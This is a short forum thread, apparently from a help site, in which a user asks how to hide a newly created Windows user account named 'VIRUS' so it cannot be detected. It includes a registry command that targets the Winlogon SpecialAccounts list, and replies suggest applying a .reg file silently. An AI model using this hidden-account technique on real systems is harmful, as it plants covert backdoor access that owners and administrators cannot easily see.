I made a batch wich add a User Account, and ofc i want it hidden so one cannot detect it
REG add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v VIRUS /t REG_DWORD /d 0 /f>nul
Does not work?
Add the key and the options in a .reg file, and run the following command; REGEDIT /S YOURFILE.REG
Regards,
Happy is ONE who says I am an OttoMAN.
but i wich to do it from a batch file so i can, Hide and Unhide it, its more convinient..
anyway if what if i removed >nul?
check this out...i beleive this is what you wanted..
http://www.computing.net/howtos/sho...Subhash Chandra.
www.s-chandra.co.cc
Yes (14) | ![]() | |
No (14) | ![]() | |
I don't know (15) | ![]() |